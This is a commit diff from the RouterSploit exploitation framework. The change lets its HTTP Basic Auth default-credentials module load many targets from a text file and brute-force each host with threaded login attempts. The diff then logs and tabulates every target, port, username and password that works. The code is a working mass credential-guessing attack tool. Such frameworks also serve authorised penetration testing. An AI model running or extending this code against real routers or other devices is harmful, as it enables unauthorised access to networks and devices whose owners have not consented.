Skip to content

R
routersploit
Commit 3e78ec24 by fwkz
Options

Feeding exploit with targets from text file placed within creds module

parent 9c0390f4
Showing with 42 additions and 16 deletions
routersploit/interpreter.py
......@@ -288,10 +288,6 @@ class RoutersploitInterpreter(BaseInterpreter):
@utils.module_required
def command_run(self, *args, **kwargs):
utils.print_status("Running module...")
if self.current_module.target.startswith("file://"):
self.__multiple_run()
return
try:
self.current_module.run()
except:
......
routersploit/modules/creds/http_basic_default.py
......@@ -11,6 +11,7 @@ from routersploit import (
print_table,
sanitize_url,
boolify,
http_request
)
......@@ -37,18 +38,45 @@ class Exploit(exploits.Exploit):
def run(self):
self.credentials = []
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
if self.target.startswith('file://'):
self.multi_run()
else:
self.single_run()
def multi_run(self):
original_target = self.target
original_port = self.port
_, _, feed_path = self.target.partition("file://")
try:
r = requests.get(url, verify=False)
except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
print_error("Invalid URL format: %s" % url)
file_handler = open(feed_path, 'r')
except IOError:
print_error("Could not read file: {}".format(self.target))
return
except requests.exceptions.ConnectionError:
print_error("Connection error: %s" % url)
for target in file_handler:
target = target.strip()
if not target:
continue
self.target, _, port = target.partition(':')
if port:
self.port = port
print_status("Attack against: {}:{}".format(self.target, self.port))
self.single_run()
self.target = original_target
self.port = original_port
file_handler.close()
def single_run(self):
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
response = http_request("GET", url)
if not response:
return
if r.status_code != 401:
if response.status_code != 401:
print_status("Target is not protected by Basic Auth")
return
......@@ -60,13 +88,15 @@ class Exploit(exploits.Exploit):
collection = LockedIterator(defaults)
self.run_threads(self.threads, self.target_function, collection)
if len(self.credentials):
if self.credentials:
print_success("Credentials found!")
headers = ("Login", "Password")
headers = ("Target", "Port", "Login", "Password")
print_table(headers, *self.credentials)
else:
print_error("Credentials not found")
defaults.close()
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
......@@ -83,10 +113,10 @@ class Exploit(exploits.Exploit):
if r.status_code != 401:
running.clear()
print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
self.credentials.append((user, password))
print_success("Target: {}:{} {}: Authentication succeed!".format(self.target, self.port, name), user, password, verbose=module_verbosity)
self.credentials.append((self.target, self.port, user, password))
else:
print_error(name, "Authentication Failed - Username: '{}' Password: '{}'".format(user, password), verbose=module_verbosity)
print_error(name, "Target: {}:{} Authentication Failed - Username: '{}' Password: '{}'".format(self.target, self.port, user, password), verbose=module_verbosity)
except StopIteration:
break
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment